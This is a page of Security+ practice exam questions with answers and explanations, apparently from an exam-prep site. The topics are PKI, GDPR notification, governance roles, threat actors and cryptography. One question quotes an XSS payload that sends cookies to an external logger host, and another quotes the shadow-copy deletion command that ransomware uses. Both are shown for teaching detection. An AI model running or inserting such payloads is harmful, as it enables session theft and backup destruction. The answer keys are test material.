All practice questions

2232 questions

Question 41Question

A network administrator is establishing PKI certificate management processes and automated revocation checks for a cluster of internal web applications. To ensure optimal security during certificate issuance and minimize handshake latency during revocation checking, which of the following implementation steps should the administrator select? (Select TWO).

Select all that apply

Show answer & explanation

Answer: Generate the private key locally on the target web server when creating the Certificate Signing Request (CSR) before submitting it to the Certificate Authority.; Configure OCSP stapling on the web servers so that cached, digitally signed CA revocation responses are delivered directly to client browsers during the TLS handshake.

Answer

The correct implementation steps are local private key generation during CSR creation and configuring OCSP stapling on web servers.
Generating the private key locally when creating a CSR ensures the private key is never exposed across the network. Enabling OCSP stapling allows the web server to append signed revocation proof directly during the TLS handshake, reducing latency and avoiding client connection delays.

Step-by-Step Solution

1
Analyze certificate request lifecycle security requirements
Confirm that private keys must be generated locally on the requestor endpoint so that the key is never transferred across the network.
Maintaining private key isolation on the endpoint prevents exposure and maintains the integrity of asymmetric key pairs.
2
Evaluate revocation checking optimization methods
Identify OCSP stapling as the mechanism where web servers periodically fetch and staple timestamped, signed OCSP responses to TLS handshakes.
OCSP stapling avoids third-party OCSP responder queries by clients, eliminating external lookup latency and bandwidth overhead.

Key Concept

PKI Certificate Request Flow and OCSP Stapling Revocation Verification
Question 42Question

A university based in the United States operates an online portal for international exchange programs, collecting personal identification details and financial records from European Union residents. Following a confirmed security incident involving unauthorized access to the application database, the compliance officer is determining legal breach notification duties. Which of the following obligations MUST the institution fulfill to satisfy regulatory compliance mandates? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Notify the relevant supervisory authority without undue delay and, where feasible, no later than 72 hours after becoming aware of the breach if it poses a risk to individuals.; Communicate the personal data breach to affected data subjects without undue delay when the incident is likely to result in a high risk to their rights and freedoms.

Answer

The organization must notify the competent supervisory authority within 72 hours of awareness if a risk exists, and communicate the breach to affected individuals without undue delay if a high risk to rights and freedoms is present.
Under international privacy frameworks like GDPR, organizations processing personal data of EU residents must fulfill dual notification obligations upon experiencing a qualifying breach. Data controllers must notify the supervisory authority within 72 hours if a risk to individuals exists, and directly inform affected data subjects without undue delay if the incident poses a high risk to their rights and freedoms.

Step-by-Step Solution

1
Identify the territorial and material scope of applicable regulations based on data subject residency.
The university processes personal data of EU residents, bringing breach notifications under GDPR jurisdiction.
GDPR applies extra-territorially to non-EU entities offering services to or monitoring data subjects in the EU.
2
Determine the legal timeframes and thresholds for supervisory authority notification.
Supervisory notification is required within 72 hours of awareness if the breach poses a risk to individuals.
Article 33 of GDPR establishes the 72-hour reporting rule for data controllers.
3
Determine the conditions required for notifying impacted data subjects.
Individual notification is required without undue delay when a high risk to rights and freedoms is present.
Article 34 of GDPR establishes communication duties directly to individuals when breach severity passes the high-risk threshold.

Key Concept

GDPR Breach Notification Rules and Timelines
Estimated Time:1m 30s
Question 43Question

A security administrator inspecting Network Intrusion Detection System (NIDS) alerts detects an HTTP POST request targeting an internal human resources portal. The recorded packet payload contains the string: `user=jdoe&token=<script>document.location='http://external-logger.net/collect?c='+document.cookie</script>`. Which of the following correctly identifies the vector shown in the alert and the proper security control response?

Show answer & explanation

Answer: Cross-Site Scripting (XSS); deploy a Web Application Firewall (WAF) or application-level sanitization to inspect and block malicious scripts.

Answer

Cross-Site Scripting (XSS); deploy a Web Application Firewall (WAF) or application-level sanitization to inspect and block malicious scripts.
The recorded log string features script tags (`<script>`) designed to execute JavaScript in a target browser and exfiltrate session cookie data. This is a classic Cross-Site Scripting (XSS) payload. Because NIDS operates as a passive detective control, appropriate remediation requires application-aware protection such as input sanitization or a Web Application Firewall (WAF).

Step-by-Step Solution

1
Analyze the log payload structure
The payload includes JavaScript tags (`<script>...document.cookie...`) designed to steal session tokens via browser execution.
Identifying browser-executed script injection confirms the attack type as Cross-Site Scripting (XSS) rather than database manipulation (SQLi).
2
Evaluate control requirements for out-of-band NIDS alerts
Out-of-band NIDS provides detective alerting but cannot block active traffic inline.
Mitigating web application attack vectors requires application-layer defensive controls (such as WAF or input validation) rather than misconfiguring detective monitoring systems.

Key Concept

Identifying Cross-Site Scripting (XSS) payloads in network security monitoring logs and selecting application-layer mitigation controls.
Question 44Question

An information security officer at a biotechnology research institute is restructuring the organization's governance framework to align with updated compliance requirements. The officer must distinguish mandatory governance mandates from non-binding operational advice across the enterprise. Which of the following document types represent mandatory governance requirements that employees and systems must strictly follow? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Enterprise Security Policy outlining executive direction, scope, and high-level security directives.; Technical Security Standard specifying mandatory baseline configurations and specific technology rules.

Answer

The mandatory governance requirements are the Enterprise Security Policy and the Technical Security Standard.
Both policies and standards represent mandatory governance elements. An enterprise security policy provides top-down executive directives establishing mandatory compliance rules for the organization, while technical security standards set mandatory specific technical thresholds, hardware/software baselines, and configuration requirements.

Step-by-Step Solution

1
Analyze the security governance document hierarchy.
Governance documentation is categorized into mandatory directives (policies, standards, procedures) and non-binding advice (guidelines).
Understanding document authority determines compliance enforcement obligations.
2
Evaluate the role of an Enterprise Security Policy.
Policies are executive-level, overarching directives that mandate compliance across all organizational units.
It sets the mandatory foundational rules and goals.
3
Evaluate the role of a Technical Security Standard.
Standards mandate explicit technical configurations, protocols, and baselines that must be implemented without exception.
It translates high-level policy mandates into mandatory, measurable technical requirements.

Key Concept

Security Governance Hierarchy (Policy vs. Standard vs. Guideline)
Question 45Question

A regional logistics company based in the United States is expanding fleet management operations into the European Union. The engineering team plans to deploy AI-driven in-cab cameras that continuously scan driver facial features to detect signs of fatigue and alert dispatchers. Because facial scanning involves processing special category biometric data to uniquely identify individuals, the security governance team must ensure compliance with EU data privacy regulations. Which of the following actions is mandatory prior to initiating this high-risk data processing activity?

Show answer & explanation

Answer: Conduct a Data Protection Impact Assessment (DPIA) to identify privacy risks and determine required safeguards.

Answer

Conducting a Data Protection Impact Assessment (DPIA) is mandatory prior to processing high-risk biometric data under GDPR.
The General Data Protection Regulation (GDPR) classifies biometric data processed for uniquely identifying a natural person as special category data. Article 35 mandates that organizations conduct a Data Protection Impact Assessment (DPIA) prior to carrying out processing operations likely to result in a high risk to the rights and freedoms of individuals, such as automated systematic monitoring and biometric scanning.

Step-by-Step Solution

1
Analyze the data type and regulatory scope described in the scenario.
The logistics firm is processing driver facial biometric data within the EU, which falls under GDPR Article 9 (special category data).
Biometric identification data requires heightened statutory protection.
2
Determine the mandatory compliance requirements for high-risk processing.
Systematic monitoring and processing of special category data require a Data Protection Impact Assessment (DPIA) under GDPR Article 35 prior to deployment.
A DPIA helps organizations systematically analyze, identify, and minimize privacy risks associated with new technology implementations.

Key Concept

Data Protection Impact Assessment (DPIA) and GDPR Biometric Data Requirements
Question 46Question

A multinational logistics firm is standardizing its wireless network infrastructure across regional distribution hubs. IT leadership issues a mandatory document detailing exact technical requirements—such as requiring WPA3-Enterprise encryption for all wireless access points—that all regional engineering teams must strictly enforce without deviation. Which of the following governance document types describes this document?

Show answer & explanation

Answer: Security standard

Answer

The document described is a security standard because it defines compulsory, exact technical requirements that must be enforced without deviation.
A security standard is a mandatory governance document that sets specific technical rules, hardware requirements, or configuration parameters that an organization must enforce uniformly. Specifying mandatory WPA3-Enterprise encryption across wireless access points is a classic example of a security standard.

Step-by-Step Solution

1
Analyze the mandatory nature and specific technical detail level of the governance document.
The document prescribes exact technical settings (WPA3-Enterprise encryption) and mandates strict enforcement across regional hubs.
Governance documents are categorized based on their level of abstraction and whether compliance is mandatory or discretionary.
2
Differentiate between policies, standards, baselines, and guidelines.
High-level goals represent policies; specific mandatory rules represent standards; minimum platform configurations represent baselines; recommendations represent guidelines.
Security standards bridge high-level policy goals with granular technical implementations.
3
Select the governance document type matching mandatory technical requirements.
Security standard is the exact match.
Standards require compliance without deviation across all applicable infrastructure components.

Key Concept

Security Governance Hierarchy (Policies, Standards, Baselines, Guidelines)
Question 47Question

During an internal compliance audit of an online education organization, a security manager discovers that the database administration (DBA) team currently defines data sensitivity levels, determines retention schedules, and approves external data-sharing requests for student records. The DBAs also manage database backups, patch management, and access control list (ACL) configurations. Which of the following recommendations should the security manager make to properly align data governance responsibilities?

Show answer & explanation

Answer: Reassign data classification authority, retention policy rules, and access approval decisions to the executive business unit leader as the Data Owner, while keeping the database administration team as Data Custodians for technical controls.

Answer

Reassign data classification authority, retention policy rules, and access approval decisions to the executive business unit leader as the Data Owner, while keeping the database administration team as Data Custodians for technical controls.
The correct option properly separates business accountability from technical implementation. The Data Owner is typically a business executive or department head who understands the business value of the information and is responsible for defining classification levels, establishing retention guidelines, and granting access authorization. The Data Custodian (in this case, the database administration team) is responsible for implementing the technical safeguards, managing backups, configuring database encryption, and applying system updates in accordance with directives from the Data Owner.

Step-by-Step Solution

1
Analyze the operational roles currently held by the database administration team
Identified that DBAs are performing both business accountability functions (classification, retention policies, access approval) and technical execution duties (backups, patching, ACL implementation).
Governance frameworks require clear separation between business ownership and technical implementation.
2
Differentiate between Data Owner and Data Custodian roles
The Data Owner (business lead) holds ultimate decision-making authority for data classification, policy requirements, and access rights. The Data Custodian (DBAs/IT staff) implements technical controls to safeguard data according to those policies.
Segregation of duties ensures operational personnel do not set policies for data they maintain.
3
Select the proper remediation strategy
Reassign data ownership responsibilities to the business unit leader while retaining DBAs in their technical custodian role.
This aligns governance practices with standard security framework expectations.

Key Concept

Data Owner vs. Data Custodian Responsibilities
Estimated Time:1m 30s
Question 48Question

An international e-commerce organization headquartered in the United States discovers an unauthorized database export containing names, email addresses, and behavioral tracking logs of customers residing in the European Union. Which regulatory framework explicitly mandates that the data controller notify the competent supervisory authority without undue delay and, where feasible, no later than 72 hours after becoming aware of the personal data breach?

Show answer & explanation

Answer: General Data Protection Regulation (GDPR)

Answer

The General Data Protection Regulation (GDPR) mandates notification to the supervisory authority within 72 hours of becoming aware of a personal data breach involving EU residents.
The General Data Protection Regulation (GDPR) applies extraterritorially to any entity processing the personal data of data subjects located within the European Union. Under GDPR Article 33, when a breach occurs that poses a risk to individuals' rights and freedoms, the organization acting as the data controller must report the breach to its supervisory authority within 72 hours of discovery.

Step-by-Step Solution

1
Identify the data classification and geographical jurisdiction of the affected individuals in the scenario.
The exposed data comprises customer names, emails, and behavioral tracking data (personally identifiable information) belonging to residents of the European Union.
Regulatory jurisdiction for privacy legislation is governed by the location and residency of the affected data subjects, establishing European privacy law applicability regardless of company headquarters location.
2
Evaluate the regulatory mandate requiring a 72-hour breach notification window to supervisory authorities.
Article 33 of the General Data Protection Regulation (GDPR) specifies a strict 72-hour notification timeframe to the relevant lead supervisory authority following breach awareness.
This timeline ensures prompt regulatory oversight and assessment of risks to individuals' rights and freedoms.

Key Concept

GDPR Data Breach Notification Obligations
Estimated Time:1m 15s
Question 49Question

An organization is defining service continuity metrics for its cloud-hosted human resources application during a Business Impact Analysis (BIA). Executive management mandates that in the event of a storage array failure, the system must be fully restored and operational within 6 hours, and data loss must not exceed 30 minutes of transactions. Which metric directly defines the 30-minute data loss threshold?

Show answer & explanation

Answer: Recovery Point Objective (RPO)

Answer

Recovery Point Objective (RPO)
Recovery Point Objective (RPO) is the targeted duration of time between two backups that specifies the maximum allowable data loss caused by a major disruption. In this scenario, the 30-minute threshold represents the RPO.

Step-by-Step Solution

1
Identify the metric constraint given in the scenario regarding data loss
The scenario highlights a maximum data loss limit of 30 minutes of transactions.
Business Impact Analysis metrics distinguish data loss limits from system restoration speed.
2
Map the data loss timeframe constraint to standard business continuity metrics
Recovery Point Objective (RPO) specifically dictates the maximum acceptable interval of data lost due to a disruption.
RPO dictates backup frequency requirements so data loss does not exceed the target period.

Key Concept

Recovery Point Objective (RPO) vs. Recovery Time Objective (RTO)
Question 50Question

Match each core Zero Trust Architecture (ZTA) control plane component with its primary operational responsibility in accordance with NIST SP 800-207 standards.

Click a left item, then click its matching right item

Items

Policy Engine (PE)
Policy Administrator (PA)
Policy Enforcement Point (PEP)

Matches

Show answer & explanation

Answer

Policy Engine pairs with evaluating access requests and making decision choices; Policy Administrator pairs with issuing control commands to manage sessions; Policy Enforcement Point pairs with gating and monitoring active connections in the data path.
Each Zero Trust Architecture component fulfills a distinct logical role specified in NIST SP 800-207: the Policy Engine acts as the decision maker, the Policy Administrator serves as the controller executing control plane commands, and the Policy Enforcement Point directly controls connection flows in the data plane.

Step-by-Step Solution

1
Identify the primary function of the Policy Engine.
Recognize that the Policy Engine is responsible for the trust decision logic.
It processes subject, resource, and environment attributes against security rules to evaluate access authorization.
2
Identify the primary function of the Policy Administrator.
Recognize that the Policy Administrator translates policy decisions into control signals.
It instructs the Policy Enforcement Point to open or close the specific session path.
3
Identify the primary function of the Policy Enforcement Point.
Recognize that the Policy Enforcement Point sits on the data plane.
It directly intercepts, enables, monitors, and terminates network connections between subjects and targets.

Key Concept

Zero Trust Architecture Control and Data Plane Components
Question 51Question

A security operations team wants to identify unauthorized credential harvesting and post-exploitation lateral movement within a hybrid cloud enterprise network. To achieve this without altering production network routing or risking asset compromise, the team injects synthetic cloud API keys and decoy Kerberos ticket-granting service (TGS) requests into the LSASS memory space of critical endpoints. When an attacker attempts to extract these fake credentials and present them to a decoy authentication service, an alert is triggered immediately. Which of the following deception and disruption technologies did the organization deploy?

Show answer & explanation

Answer: Honeytokens acting as breadcrumbs

Answer

Honeytokens acting as breadcrumbs
The deployment of synthetic API keys and decoy Kerberos credentials directly into endpoint memory represents the use of honeytokens configured as breadcrumbs. Honeytokens are deceptive data items or fake credentials that trigger alerts upon unauthorized use, while breadcrumbs are host-based artifacts placed to entice attackers toward decoy resources.

Step-by-Step Solution

1
Analyze the technical requirements of the scenario.
The organization needs to detect post-exploitation credential harvesting and lateral movement from host memory without impacting production routing.
Traditional perimeter defenses often miss lateral movement when legitimate tools or stolen memory credentials are used.
2
Evaluate the deployed deceptive elements.
The deployed artifacts are fake credentials (synthetic API keys and decoy Kerberos TGS tickets) placed on endpoints to guide adversaries into decoy authentication traps.
Fake credentials or data items designed to trigger alerts when accessed are classified as honeytokens, and when strategically left on host systems to lure attackers, they function as breadcrumbs.
3
Differentiate honeytokens/breadcrumbs from network honeynets, traditional IPS controls, and honeyfiles.
Decoy host memory credentials map precisely to honeytokens serving as breadcrumbs rather than network-level honeynets, DNS sinkholes, or file-based honeyfiles.
Honeytokens target credential usage and memory inspection, while honeyfiles target file system operations and honeynets simulate entire network segments.

Key Concept

Deception Technologies: Honeytokens and Breadcrumbs
Question 52Question

An enterprise deploys several virtual machines in a cloud environment. The organization's internal IT team is responsible for installing operating system security patches, configuring guest firewalls, and managing application software, while the cloud provider manages the underlying physical hardware and hypervisor infrastructure. Which cloud service model is being used?

Show answer & explanation

Answer: Infrastructure as a Service (IaaS)

Answer

Infrastructure as a Service (IaaS)
Infrastructure as a Service (IaaS) provides customers with virtualized computing resources over the cloud. Under the shared responsibility model for IaaS, the cloud provider manages the physical data centers, hardware servers, storage, and hypervisors, whereas the client remains fully responsible for managing and securing the guest operating systems, network configurations, database instances, and installed applications.

Step-by-Step Solution

1
Analyze the customer's operational responsibilities described in the scenario
The customer manages operating system patching, guest firewall rules, and application installations.
Identifying the highest level of system access controlled by the client defines the boundary of the shared responsibility model.
2
Analyze the cloud service provider's responsibilities described in the scenario
The vendor maintains the physical servers, data center facilities, and hypervisors.
Determining what infrastructure components are outsourced helps classify the service model.
3
Map the responsibility allocation to standard cloud service models
Providing raw compute, storage, and networking hardware while leaving OS control to the consumer defines Infrastructure as a Service (IaaS).
IaaS provides bare virtualization resources where the client retains control from the guest OS upward.

Key Concept

Cloud Service Models and Shared Responsibility Boundaries
Question 53Question

A security analyst is tasked with assessing a newly deployed web application hosted in a staging environment. The analyst needs to identify runtime vulnerabilities, such as parameter tampering and input validation flaws, operating from a black-box perspective without access to the underlying source code. Which of the following security testing methods is most appropriate for this assessment?

Show answer & explanation

Answer: Dynamic Application Security Testing (DAST)

Answer

Dynamic Application Security Testing (DAST)
Dynamic Application Security Testing (DAST) operates as a black-box security testing method on executed code. It simulates external attacks against a running application to discover dynamic runtime vulnerabilities, such as input validation flaws, without needing access to the application's underlying source code.

Step-by-Step Solution

1
Analyze the operational requirements provided in the scenario.
The assessment requires identifying runtime flaws (such as input validation errors) on an active application from a black-box perspective (no source code access).
Understanding testing constraints narrows down the appropriate vulnerability assessment methodology.
2
Evaluate candidate security testing methodologies against the identified constraints.
Dynamic Application Security Testing (DAST) interacts with a running application by sending inputs and analyzing responses without inspecting source code.
DAST is specifically engineered for dynamic black-box testing of functional web applications.

Key Concept

Vulnerability Assessment and Security Testing Methods (DAST vs SAST)
Question 54Question

An enterprise system Administrator discovers that a malicious script unexpectedly executed on a server immediately after a terminated employee's user account was disabled. The script was configured to monitor user directory changes and wipe database backups once the account status changed. Which type of malware or malicious code relies on a predefined trigger condition or specific event to execute its payload?

Show answer & explanation

Answer: Logic bomb

Answer

Logic bomb
A logic bomb is a piece of code intentionally inserted into software that lies dormant until specific logical conditions are met, such as a set date, specific command, or account deletion event.

Step-by-Step Solution

1
Analyze the incident scenario and key operational indicators.
Identified that the code executed automatically in response to a specific logical event (user account disabling).
Determining the operational trigger distinguishes event-driven malicious code from user-executed or self-propagating threats.
2
Map the execution behavior to established malware classifications.
Malicious code dormant until triggered by specific system state changes or time events matches the definition of a logic bomb.
Logic bombs lie dormant until specific environmental or conditional triggers occur.

Key Concept

Logic Bomb Indicators and Characteristics
Question 55Question

A security operations team investigating an incident at a global maritime logistics enterprise discovers that an unauthorized external entity compromised an edge API endpoint used by a third-party tracking partner. The threat actor utilized legitimate, stolen developer API tokens to gain access. Over an eight-month period, the actor made subtle, highly targeted modifications to cargo manifest metadata to delay specific dual-use technology shipments across international borders. The actor avoided deploying malware, exfiltrating bulk data, or disrupting general operations to evade detection by automated security controls. Based on these observed tactics, techniques, and procedures (TTPs), which threat actor profile and attribute combination is MOST likely responsible for this attack?

Show answer & explanation

Answer: Nation-state threat actor possessing high sophistication, extensive funding, and long-term geopolitical intent

Answer

The threat actor profile most likely responsible is a nation-state threat actor possessing high sophistication, extensive funding, and long-term geopolitical intent.
The correct answer identifies a nation-state actor because the attack TTPs emphasize long-term stealth (eight months of living-off-the-land without malware), a supply chain attack vector via third-party API trust, and strategic disruption of sensitive dual-use shipments. These characteristics align strictly with state-sponsored Advanced Persistent Threats (APTs) driven by geopolitical goals and supported by significant financial and technological resources.

Step-by-Step Solution

1
Analyze the operational behavior and attack vector described in the incident report.
The adversary leveraged a third-party supply chain vector (stolen developer API keys) to maintain stealthy persistence for eight months without deploying malware.
Identifying the vector highlights the level of planning and operational discipline required.
2
Evaluate the primary intent and motivation demonstrated in the scenario.
The goal was subtle sabotage of dual-use hardware shipments over an extended period rather than data theft for resale or ransom extortion.
Geopolitical sabotage alignment strongly indicates state-sponsored motives rather than financial or publicity-driven goals.
3
Correlate actor attributes (sophistication, resources, funding) with threat actor categories.
High sophistication, extensive resources, and patience are defining characteristics of nation-state Advanced Persistent Threat (APT) groups.
Only well-funded nation-state entities typically conduct prolonged, low-and-slow supply chain operations for strategic intelligence or disruption objectives.

Key Concept

Threat Actor Categorization and Attribute Mapping
Estimated Time:2m 0s
Question 56Question

An enterprise financial institution plans to automate the ingestion of machine-readable threat indicators specifically sourced from peer sector organizations while standardizing automated indicator transport into its Security Orchestration, Automation, and Response (SOAR) platform. Which of the following solutions should the cybersecurity team implement to achieve these specific objectives? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Financial Services Information Sharing and Analysis Center (FS-ISAC) subscription; Trusted Automated eXchange of Intelligence Information (TAXII) feed integration

Answer

The cybersecurity team should implement a Financial Services Information Sharing and Analysis Center (FS-ISAC) subscription and a Trusted Automated eXchange of Intelligence Information (TAXII) feed integration.
To fulfill the requirements, the organization needs both a sector-specific community threat source and an automated protocol for machine-readable ingestion. Subscribing to an Information Sharing and Analysis Center (specifically FS-ISAC for financial entities) supplies specialized threat data from peer institutions. Integrating a TAXII feed provides the standardized, machine-to-machine RESTful transport protocol needed to automatically ingest structured threat data directly into security orchestration platforms.

Step-by-Step Solution

1
Identify the requirement for sector-specific peer intelligence sharing.
Determined that joining an ISAC (such as FS-ISAC) provides vetted threat intelligence specifically tailored to and shared by peer institutions within the financial sector.
ISACs facilitate targeted industry information sharing regarding sector-relevant attack vectors and active campaigns.
2
Identify the protocol mechanism required for machine-readable, automated threat indicator transport.
Selected TAXII as the automated transport mechanism to push and pull threat data directly into the SOAR platform.
TAXII is specifically built to automate the secure exchange of structured threat intelligence data feeds across networks.
3
Evaluate alternative options for alignment with automation and sector specificity.
Disqualified NVD feeds (vulnerability focus, not threat indicators), strategic briefings (high-level executive human reports, not machine-readable), and manual OSINT RSS scrapers (unstructured human-readable blog data).
These alternatives fail to meet the dual criteria of sector-specific peer intelligence sharing and automated machine-readable transport.

Key Concept

Threat Intelligence Sharing Architectures (ISACs and TAXII)
Question 57Question

A security operations team at an autonomous vehicle software vendor detects a long-term breach of their internal development environment. The investigation reveals that the adversary exploited an undisclosed zero-day vulnerability in a perimeter gateway, used custom memory-resident tools to avoid endpoint detection, and maintained persistence for over six months strictly to exfiltrate proprietary machine learning models without disrupting operations or making extortion demands. Which threat actor profile best aligns with the attributes and tactics observed in this scenario?

Show answer & explanation

Answer: Nation-state threat actor possessing high sophistication, extensive funding, and espionage-focused intent.

Answer

Nation-state threat actor possessing high sophistication, extensive funding, and espionage-focused intent.
The correct answer identifies a nation-state actor. The use of zero-day exploits, custom memory-resident malware, long-term covert persistence (six-plus months), and stealthy exfiltration of high-value intellectual property without extortion demands are classic attributes of state-sponsored Advanced Persistent Threats (APTs).

Step-by-Step Solution

1
Analyze threat actor tactics and capabilities.
The adversary leveraged undisclosed zero-day vulnerabilities and custom memory-resident malware, indicating high technical sophistication and resources.
Advanced capabilities and custom tooling differentiate highly funded adversaries from low-capability attackers.
2
Evaluate adversary persistence and intent.
The adversary maintained covert access for over six months to conduct IP exfiltration while avoiding operational disruption or financial demands.
Prolonged stealth for strategic intelligence/IP theft aligns directly with cyber espionage objectives.
3
Synthesize attributes to identify the threat actor classification.
High sophistication + high funding + covert persistence + IP exfiltration = Nation-state threat actor (APT).
This combination of attributes and motivation is the hallmark of state-sponsored advanced persistent threat (APT) groups.

Key Concept

Threat Actor Classification and Attribute Mapping
Estimated Time:1m 30s
Question 58Question

A security monitoring tool flags multiple enterprise endpoints executing command-line instructions to disable the Volume Shadow Copy Service (`vssadmin delete shadows /all /quiet`) while concurrently generating high-volume disk write events that append custom file extensions to local documents. Which of the following malware types is most likely responsible for this activity?

Show answer & explanation

Answer: Ransomware

Answer

Ransomware is the malware type characterized by file encryption and backup inhibition techniques like volume shadow copy deletion.
The combination of erasing volume shadow copies (`vssadmin delete shadows`) and rapid file modification with new extensions is a classic indicator of compromise (IoC) for ransomware. Attackers destroy local backups to force victims into paying a ransom for decryption keys.

Step-by-Step Solution

1
Analyze the observed command-line behavior
The command `vssadmin delete shadows /all /quiet` is designed to erase local system restore points and volume snapshots.
Attackers run this command specifically to inhibit system recovery.
2
Analyze file system activity indicators
Rapid high-volume disk writes appending custom file extensions signify payload encryption.
Cryptographic file modification combined with backup destruction points directly to ransomware extortion activity.

Key Concept

Ransomware Indicators of Compromise and Impact Behaviors
Question 59Question

A lead security auditor is reviewing a security assessment proposal for a facility that manages sensitive operational technology (OT) and legacy SCADA devices. The assessment team initially proposes running high-intensity active vulnerability scans across all subnets to discover open ports, running services, and unpatched vulnerabilities. The lead auditor rejects this proposal due to the high risk of intrusive active probing crashing sensitive legacy controllers. Which security assessment method should the lead auditor recommend as the safest alternative to identify active hosts and services on the OT network without disrupting operational systems?

Show answer & explanation

Answer: Passive network traffic monitoring

Answer

Passive network traffic monitoring is the safest assessment method because it observes existing network traffic to discover active hosts and services without transmitting intrusive probes that could destabilize sensitive SCADA controllers.
Passive network traffic monitoring observes and analyzes existing network communication via SPAN ports or TAPs. Because it sends no traffic to the network, it eliminates the risk of disrupting sensitive, legacy, or real-time operational technology devices while still identifying active hosts, protocols, and potential configuration weaknesses.

Step-by-Step Solution

1
Analyze the operational constraints of the target environment.
Identified that legacy SCADA and OT systems cannot tolerate intrusive, high-intensity network traffic probing due to stability risks.
Legacy industrial control systems often lack robust network stacks and can crash when receiving unexpected or high-volume scan packets.
2
Evaluate assessment methodologies based on interaction level.
Selected non-intrusive monitoring over active scanning techniques.
Passive monitoring relies on listening to existing traffic via mirror/SPAN ports or network TAPs, generating zero additional network traffic.

Key Concept

Passive vs. Active Vulnerability Assessment
Question 60Question

A financial institution's security team is investigating an incident where confidential transaction payloads transmitted over an encrypted TLS connection were intercepted and decrypted by an adversary positioned on the network path. Technical analysis reveals that the server accepted legacy TLS 1.2 connections configured with AES in Cipher Block Chaining (CBC) mode using predictable initialization vectors (IVs) and HMAC-SHA1. Which cryptographic weakness directly enabled the adversary to decrypt the payload without possessing the server's private key?

Show answer & explanation

Answer: Implementation of Cipher Block Chaining mode with predictable initialization vectors, allowing side-channel padding oracle attacks to recover plaintext block-by-block.

Answer

Implementation of Cipher Block Chaining mode with predictable initialization vectors, allowing side-channel padding oracle attacks to recover plaintext block-by-block.
In Cipher Block Chaining (CBC) mode, each plaintext block is XORed with the previous ciphertext block (or the Initialization Vector for the first block) before encryption. Using predictable IVs destroys semantic security and enables padding oracle side-channel attacks. Attackers exploit subtle server responses to invalid padding to iteratively decrypt ciphertexts block-by-block without possessing the private key.

Step-by-Step Solution

1
Analyze the reported scenario and cryptographic parameters
Identified TLS 1.2 using AES-CBC mode with predictable initialization vectors and HMAC-SHA1.
Cryptographic vulnerabilities depend specifically on how cipher modes, keying material, and initialization vectors are implemented.
2
Evaluate the mathematical impact of predictable IVs in CBC mode
Determined that predictable IVs allow an attacker to craft specific ciphertexts and observe server padding response errors.
CBC mode requires unpredictable (random) IVs for each block operation to guarantee semantic security under chosen-plaintext and chosen-ciphertext attacks.
3
Differentiate cryptographic implementation flaws from architecture and lifecycle misconceptions
Confirmed that padding oracle vulnerabilities explain plaintext extraction without requiring the private key.
Padding oracle attacks exploit subtle differences in error responses when padded ciphertexts are decrypted, enabling byte-by-byte plaintext recovery.

Key Concept

Cryptographic Cipher Mode Flaws and Initialization Vector Weaknesses
PreviousPage 3 / 112Next
All practice questions — CompTIA Security+ | Examkin